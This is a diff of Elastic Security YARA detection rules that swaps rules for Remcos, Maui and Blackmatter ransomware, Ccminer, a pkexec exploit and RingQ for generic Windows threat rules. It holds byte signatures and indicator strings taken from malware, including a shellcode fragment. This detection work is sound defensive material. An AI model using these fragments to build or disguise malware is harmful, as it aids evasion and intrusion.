"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "010e3aeb26533d418bb7d2fdcfb5ec21b36603b6abb63511be25a37f99635bce" + logic_hash = "1087e0befceac2606ce5dc5f2b42b45ebad888e7d3e451c3fb89de7e932a31f5" score = 75 quality = 75 - tags = "FILE, CVE-2021-4034" - fingerprint = "b145df35499a55e3e920f7701aab3b2f19af9fafbb2e0c1af53cb0b318ad06a6" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "9c58c2e028f99737574d49e47feb829058f6082414b58d6c9e569a50904591e7" + severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $s1 = "PATH=GCONV_PATH=" - $s2 = "pkexec" + $a1 = { 55 89 E5 C6 45 03 B8 C7 45 08 BA EF BE AD C7 45 0C DE 89 10 BA C7 45 10 EF BE AD DE C7 45 14 89 50 04 B8 C7 45 18 EF BE AD DE C7 45 1C 6A 00 6A 01 C7 45 20 6A 00 FF D0 C7 45 24 B8 EF BE AD C7 } condition: all of them } -rule ELASTIC_Macos_Trojan_Generic_A829D361 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_5Fbf5680 : FILE MEMORY { meta: - description = "Detects Macos Trojan Generic (MacOS.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "a829d361-ac57-4615-b8e9-16089c44d7af" - date = "2021-10-05" - modified = "2021-10-25" + id = "5fbf5680-05c3-4a77-95d7-fa3cae7b4dbe" + date = "2024-01-21" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Generic.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b2a1cd801ae68a890b40dbd1601cdfeb5085574637ae8658417d0975be8acb5" - logic_hash = "70a954e8b44b1ce46f5ce0ebcf43b46e1292f0b8cdb46aa67f980d3c9b0a6f61" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1911-L1929" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1b0553a9873d4cda213f5464b5e98904163e347a49282db679394f70d4571e77" + logic_hash = "ec5399f6fb29125cb4c096851b9194fa35fb1e5ddd1f4d4f07b155471ae5c619" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5dba43dbc5f4d5ee295e65d66dd4e7adbdb7953232faf630b602e6d093f69584" - severity = 100 + fingerprint = "7cbd8d973f31505e078781bed8067ae8dce72db076c670817e1a77e48dc790fe" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { E7 81 6A 12 EA A8 56 6C 86 94 ED F6 E8 D7 35 E1 EC 65 47 BA 8E 46 2C A6 14 5F } + $a1 = { 83 EC 3C 56 57 8B 45 08 50 E8 51 AF 00 00 83 C4 04 89 45 FC 8B 45 FC 83 C0 58 99 8B C8 8B F2 8B 45 08 99 2B C8 1B F2 89 4D F8 66 0F 57 C0 66 0F 13 45 EC C7 45 DC FF FF FF FF C7 45 E0 } condition: all of them } -rule ELASTIC_Linux_Trojan_Shark_B918Ab75 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Aa30A738 : FILE MEMORY { meta: - description = "Detects Linux Trojan Shark (Linux.Trojan.Shark)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b918ab75-0701-4865-b798-521fdd2ffc28" - date = "2021-01-12" - modified = "2021-09-16" + id = "aa30a738-616b-408c-960f-c0ea897145d0" + date = "2024-01-21" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Shark.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8b6fe9f496996784e42b75fb42702aa47aefe32eac6f63dd16a0eb55358b6054" - logic_hash = "16302c29f2ae4109b8679933eb7fd9ef9306b0c215f20e8fff992b0b848974a9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1931-L1949" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7726a691bd6c1ee51a9682e0087403a2c5a798ad172c1402acf2209c34092d18" + logic_hash = "64967fbc0e74435452752731a8b9385345cc771d27ee33cd018cccdeb26bb75e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "15205d58af99b8eae14de2d5762fdc710ef682839967dd56f6d65bd3deaa7981" - severity = 100 + fingerprint = "d2a4e1d4451d28afcef981f689de3212ff5d9c4ee8840864656082ef272f7501" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 26 00 C7 46 14 0A 00 00 00 C7 46 18 15 00 00 00 EB 30 C7 46 14 04 00 } + $a1 = { 55 8B EC 8B 55 0C 85 D2 75 04 33 C0 5D C3 8B 45 08 53 56 8B 75 10 83 FE 08 57 F7 D0 B9 FF 00 00 00 0F 8C D1 00 00 00 8B FE C1 EF 03 8B DF F7 DB 8D 34 DE 89 75 10 0F B6 1A 8B F0 23 F1 33 F3 8B } condition: all of them } -rule ELASTIC_Windows_Trojan_Remcos_B296E965 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_9A8Dc290 : FILE MEMORY { meta: - description = "Detects Windows Trojan Remcos (Windows.Trojan.Remcos)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b296e965-a99e-4446-b969-ba233a2a8af4" - date = "2021-06-10" - modified = "2021-08-23" - reference = "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Remcos.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed" - logic_hash = "069072abd1182eee50cb9937503d47845e7315d8e3cd6b63576adc8f21820c82" + id = "9a8dc290-d9ec-4d52-a4e8-db4ac6ceb164" + date = "2024-01-21" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1951-L1969" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d951562a841f3706005d7696052d45397e3b4296d4cd96bf187920175fbb1676" + logic_hash = "0097a13187b953ebe97809dda2be818cfcd94991c03e75f344e34a3d2c4fe902" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d" - severity = 100 + fingerprint = "e9f42a0fdd778b8619633cce87c9d6a3d26243702cdd8a56e524bf48cf759094" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "Remcos restarted by watchdog!" ascii fullword - $a2 = "Mutex_RemWatchdog" ascii fullword - $a3 = "%02i:%02i:%02i:%03i" - $a4 = "* Remcos v" ascii fullword + $a1 = { 6F 01 00 06 FE 0E 0B 00 FE 0C 0B 00 FE 0C 09 00 6F 78 01 00 06 FE 0C 0B 00 FE 0C 08 00 28 F2 00 00 06 6F 74 01 00 06 FE 0C 0B 00 FE 0C 07 00 28 F2 00 00 06 6F 76 01 00 06 FE 0C 0B 00 FE 09 00 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Remcos_7591E9F1 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Bbf2A354 : FILE MEMORY { meta: - description = "Detects Windows Trojan Remcos (Windows.Trojan.Remcos)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "7591e9f1-452d-4731-9bec-545fb0272c80" - date = "2023-06-23" - modified = "2023-07-10" - reference = "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Remcos.yar#L25-L49" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4e6e5ecd1cf9c88d536c894d74320c77967fe08c75066098082bf237283842fa" - logic_hash = "96acf1ba7740a8d34d929ed4a4fa446c984c3a8f64a603d428e782b6997e4d20" + id = "bbf2a354-64e5-4115-aaf7-2705194445da" + date = "2024-01-22" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1971-L1989" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b4e6c748ad88070e39b53a9373946e9e404623326f710814bed439e5ea61fc3e" + logic_hash = "6be2fae41199daea6b9d0394c9af7713543333a50620ef417bb8439d5a07f336" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "9436c314f89a09900a9b3c2fd9bab4a0423912427cf47b71edce5eba31132449" - severity = 100 + fingerprint = "8fb9fcf8b9c661e4966b37a107d493e620719660295b200cfc67fc5533489dee" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "ServRem" ascii fullword - $a2 = "Screenshots" ascii fullword - $a3 = "MicRecords" ascii fullword - $a4 = "remcos.exe" wide nocase fullword - $a5 = "Remcos" wide fullword - $a6 = "logs.dat" wide fullword + $a1 = { 54 68 61 74 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 } condition: - 3 of them + all of them } -rule ELASTIC_Linux_Cryptominer_Ccminer_18Fc60E5 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Da0F3Cbb : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Ccminer (Linux.Cryptominer.Ccminer)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "18fc60e5-680c-4ff6-8a76-12cc3ae9cd3d" - date = "2021-01-12" - modified = "2021-09-16" + id = "da0f3cbb-e894-48a3-9169-b011e7ab278d" + date = "2024-01-22" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Ccminer.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dbb403a00c75ef2a74b41b8b58d08a6749f37f922de6cc19127a8f244d901c60" - logic_hash = "75db45ccbeb558409ee9398065591472d4aee0382be5980adb9d0fb41e557789" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1991-L2009" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b2c456d0051ffe1ca7e9de1e944692b10ed466eabb38242ea88e663a23157c58" + logic_hash = "262d0bbb69adde8c4c8645813b048f3aaa2dbcc83996606e7ca21c3edea2b5d8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "461e942fcaf5faba60c3dc39d8089f9d506ff2daacb2a22573fb35bcfee9b6f1" - severity = 100 + fingerprint = "f50116e1f153d2a0e1e2dad879ba8bd6ac9855a563f6cbcbe6b6a06a96e86299" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 68 27 52 22 02 02 32 22 22 03 5C 8B AE 00 00 00 48 03 5C } + $a1 = { 55 8B EC 8B 45 0C 53 56 83 F8 FF 57 8B F1 74 03 89 46 10 8B 7D 08 33 DB 3B FB 75 17 FF 76 04 E8 C6 09 00 00 59 89 5E 04 89 5E 0C 89 5E 08 E9 D9 00 00 00 8B 4E 04 3B CB 75 23 8D 1C 3F 53 E8 7E } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Ccminer_3C593Bc3 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_7D555B55 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Ccminer (Linux.Cryptominer.Ccminer)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "3c593bc3-cb67-41da-bef1-aad9e73c34f7" - date = "2021-01-12" - modified = "2021-09-16" + id = "7d555b55-20fb-42d4-b337-c267a34fd459" + date = "2024-01-22" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Ccminer.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dbb403a00c75ef2a74b41b8b58d08a6749f37f922de6cc19127a8f244d901c60" - logic_hash = "94a0d33b474b3c60e926eaf06147eb0fdc56beac525f25326448bf2a5177d9c0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2011-L2029" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7efa5c8fd55a20fbc3a270cf2329d4a38f10ca372f3428bee4c42279fbe6f9c3" + logic_hash = "dc3a3622abbc7d0a02d8d9ed4446d0a72a603ecfd6594ecfa615e5418a9c9970" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0a382ef73d3b5d1b1ad223c66fc367cc5b6f2b23a9758002045076234f257dfe" - severity = 100 + fingerprint = "eedf850c3576425fb37291f954dfa39db758cdad0a38f85581d2bcaedcb54769" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 20 83 5C DE C2 00 00 00 68 03 5C EB EA 00 00 00 48 03 1C DC } + $a1 = { 83 EC 40 53 56 57 6A 0F 59 BE 84 77 40 00 8D 7D C0 8B 5D 0C F3 A5 66 A5 8B CB 33 C0 A4 8B 7D 08 8B D1 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA 33 C0 8D 7D 0E 50 66 AB FF 15 BC 60 40 00 50 } condition: all of them } -rule ELASTIC_Linux_Exploit_Criscras_Fc505C1D : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_0A38C7D0 : FILE MEMORY { meta: - description = "Detects Linux Exploit Criscras (Linux.Exploit.Criscras)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "fc505c1d-f77d-48cc-b8fe-7b24b9cc6a97" - date = "2021-04-06" - modified = "2021-09-16" + id = "0a38c7d0-8f5e-4dcf-9aaf-5fcf96451d3c" + date = "2024-01-22" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Criscras.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7399f6b8fbd6d6c6fb56ab350c84910fe19cc5da67e4de37065ff3d4648078ab" - logic_hash = "4d84570c13c584fb7360e798df9f3e6039ee74fdb6ad597add0ea150e3deaa80" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2031-L2049" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "69ea7d2ea3ed6826ddcefb3c1daa63d8ab53dc6e66c59cf5c2506a8af1c62ef4" + logic_hash = "e3fde76825772683c57f830759168fc9a3b3f3387f091828fd971e9ebba06d8a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bc5e980599c4c8fc3c9b560738d7187a0c91e2813c64b3ad0ff014230100c8d8" - severity = 100 + fingerprint = "43998ceb361ecf98d923c0388c00023f19d249a5ac0011dee0924fdff92af42b" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0C 89 21 89 E3 31 C0 B0 0B CD 80 31 C0 FE C0 CD } + $a1 = { 55 8B EC 8B 4D 08 85 C9 74 37 8B 45 0C 3D E0 10 00 00 7C 05 B8 E0 10 00 00 85 C0 7E 24 8D 50 FF B8 AB AA AA AA F7 E2 D1 EA 83 C1 02 42 53 8B FF 8A 41 FE 8A 19 88 59 FE 88 01 83 C1 03 4A 75 F0 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Ringq_B9715540 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_98527D90 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Ringq (Windows.Hacktool.RingQ)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b9715540-77ae-4723-a29e-d4d88d626982" - date = "2024-06-28" - modified = "2024-07-26" + id = "98527d90-90fb-4428-ab3f-6bbf23139a6e" + date = "2024-01-24" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_RingQ.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "450e01c32618cd4e4a327147896352ed1b34dca9fb28389dba450acf95f8b735" - logic_hash = "80d693c43a7026d28121e035ae875689512fd46d7f06c3f469b83d6fe707f36b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2051-L2069" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fa24e7c6777e89928afa2a0afb2fab4db854ed3887056b5a76aef42ae38c3c82" + logic_hash = "5a93f0a372f3a51233c6b2334539017df922f35a0d5f7d1749e0dd79268cb836" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f2a2d97b31cb648a6515dbf02a885a6afd434f38ed555c1e30296b7eb4550438" - severity = 100 + fingerprint = "dac4d9e370992cb4a064d64660801fa165a7e0a1f4a52e9bc3dc286395dcbc91" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "Loading Dir main.txt ..." ascii fullword - $a2 = "Loading LocalFile ..." ascii fullword - $a3 = "No Find main,txt and StringTable ..." ascii fullword - $a4 = "https://github.com/T4y1oR/RingQ" - $a5 = "RingQ :)" ascii fullword - $a6 = "1. Create.exe fscan.exe" ascii fullword - $a7 = "C:/Users/username/Documents/file.txt" ascii fullword + $a1 = { 20 FF D5 48 8D 87 0F 02 00 00 80 20 7F 80 60 28 7F 4C 8D 4C 24 20 4D 8B 01 48 89 DA 48 89 F9 FF D5 48 83 C4 28 5D 5F 5E 5B 48 8D 44 24 80 6A 00 48 39 C4 75 F9 48 83 EC 80 E9 8D 70 FC } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Ransomware_Maui_266Dea64 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Baba80Fb : FILE MEMORY { meta: - description = "Detects Windows Ransomware Maui (Windows.Ransomware.Maui)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "266dea64-2ed2-4bfc-977b-5ddb68ab05ac" - date = "2022-07-08" - modified = "2022-07-18" + id = "baba80fb-1d8a-424c-98e2-904c8f2e4f09" + date = "2024-01-24" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Maui.yar#L1-L29" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e" - logic_hash = "2094920615b6297adb222003d25a8d0934a89f24869e7e70644a4956021c7afc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2071-L2089" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dd22cb2318d66fa30702368a7f06e445fba4b69daf9c45f8e83562d2c170a073" + logic_hash = "ba0da35bc00b776ae9b427e3a4b312b1b75bdc9b972fb52f26a5df6737f1ddc9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6f6451b7a972924b2efe339b8793c30409123df37d3d64802037a5af8cb4b5f3" - severity = 100 + fingerprint = "71d9345d0288bfbbf7305962e5e316801d4a5cba332c5f4167f8e4f39cff6f61" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "Please append it by using -maui option." wide fullword - $a2 = "Please overwrite it by using -maui option." wide fullword - $a3 = "maui.log" wide fullword - $a4 = "maui.key" wide fullword - $a5 = "maui.evd" wide fullword - $a6 = "Encrypt[%s]: %s" wide fullword - $a7 = "PROCESS_GOINGON[%d%% / %d%%]: %s" wide fullword - $a8 = "PROCESS_REPLACECONFIRM: %s" wide fullword - $seq_encrypt_priv_key = { 55 8B 6C 24 ?? 57 8B F9 85 DB 74 ?? 85 FF 74 ?? 85 ED 74 ?? 56 8D 87 ?? ?? ?? ?? 50 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 51 ?? 6A ?? 52 8B F0 56 53 57 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 7F ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 5E 5F 83 C8 ?? 5D C3 } - $seq_get_private_key = { 57 8B F8 85 FF 75 ?? 5F C3 56 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 7F ?? ?? 8B F0 74 ?? 8B 07 50 56 E8 ?? ?? ?? ?? EB ?? 8B 0F 51 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 75 ?? 5E 33 C0 5F C3 } - $seq_get_pub_key = { B9 F4 FF FF FF 2B 4C 24 ?? 6A 02 51 53 E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 07 53 6A ?? 52 50 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 32 DB 8B C7 E8 ?? ?? ?? ?? 89 46 28 8B 0F 51 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 5F 8B C6 5E 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 } + $a1 = { 83 EC 0C 8B 4D 0C 53 56 57 8B 59 20 8D 71 20 8B F9 89 75 FC 85 DB 89 7D 0C 75 05 8B 59 24 EB 0C 8D 41 24 89 45 F8 8B 00 85 C0 75 30 8B 51 28 8B 41 2C 85 DB 74 03 89 53 28 85 D2 74 15 } condition: - 5 of ($a*) or 2 of ($seq*) + all of them } -rule ELASTIC_Windows_Ransomware_Blackmatter_B548D151 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_9F4A80B2 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Blackmatter (Windows.Ransomware.Blackmatter)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b548d151-5dde-459b-9d4a-b4a48c1b5545" - date = "2021-08-03" - modified = "2021-10-04" + id = "9f4a80b2-e1ee-4825-a5e5-79175213da7d" + date = "2024-01-24" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Blackmatter.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "072158f5588440e6c94cb419ae06a27cf584afe3b0cb09c28eff0b4662c15486" - logic_hash = "cf76a311de9d292a2ea09b3937b8eb7fd761b7c33a464a31acf6b9a5bf121959" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2091-L2109" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "47d57d00e2de43f33cd56ff653adb59b804e4dbe37304a5fa6a202ee20b50c24" + logic_hash = "1df3b8245bc0e995443d598feb5fe2605e05df64b863d4f47c17ecbe8d28c3ea" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "351658f8fe3f9c956634e3cf7a03b272c55359f069c5200e948d817c6b554c87" - severity = 100 + fingerprint = "86946aea009f8debf5451ae7894529dbcf79ec104a51590d542c0d64a06f2669" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 93 F0 DA 07 E7 F0 DA 07 E0 5B 99 65 47 38 96 6C 75 91 65 46 5A D0 B0 25 DA 90 42 CE F1 73 10 B1 14 BD 3C EC FD 7C AF 9B 8D 86 89 A5 FF C0 3F 78 57 8E E2 AD 2E 3A 2F 74 79 B1 FE 27 69 6B 9F 97 CE C8 67 88 1A 0B 01 F1 B7 76 35 18 E8 FF E1 D7 66 8C 41 03 EB F8 64 E5 7E F1 06 73 AB BF 6B 1D 6A B9 B6 BA 41 A2 91 49 5E 85 51 A0 83 23 46 D6 E0 E5 0F C2 53 89 2A 35 94 AF FC 87 A0 D8 08 E7 B8 DB 08 E7 78 22 E5 7E AE BB EF 16 87 08 3C 47 F0 49 1E 0D 2D 9A 1B 55 54 05 14 69 A3 1B 9C 7A 97 7B CF 85 2B 09 F9 DC 2C EB A6 55 F1 A0 07 B4 AA 80 EA ED 26 87 C0 } + $a1 = { 28 00 00 0A 2A 20 02 00 00 00 FE 0E 08 00 00 FE 0C 08 00 20 00 00 00 00 FE 01 39 0A 00 00 00 00 20 01 00 00 00 FE 0E 08 00 00 FE 0C 08 00 20 02 00 00 00 FE 01 39 05 00 00 00 38 05 00 00 00 38 } condition: - any of them + all of them } -rule ELASTIC_Windows_Ransomware_Blackmatter_8394F6D5 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_39E1Eb4C : FILE MEMORY { meta: - description = "Detects Windows Ransomware Blackmatter (Windows.Ransomware.Blackmatter)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "8394f6d5-4761-4df6-974d-eaa0a25353da" - date = "2021-08-03" - modified = "2021-10-04" + id = "39e1eb4c-32ba-4c78-9997-1c75b41dcba6" + date = "2024-01-24" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Blackmatter.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "072158f5588440e6c94cb419ae06a27cf584afe3b0cb09c28eff0b4662c15486" - logic_hash = "50a9b65ca6dde4fc32d2d57e72042f4380dd6c263ec5c33ce7c158151b91a5ae" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2111-L2129" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a733258bf04ffa058db95c8c908a79650400ebd92600b96dd28ceecac311f94a" + logic_hash = "d7791ae7513bc5645bcfa93a2d7bf9f7ef47a6727ea2ba5eb85f3c8528761429" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3825f59ffe9b2adc1f9dd175f4d57c9aa3dd6ff176616ecbe7c673b5b4d414f8" - 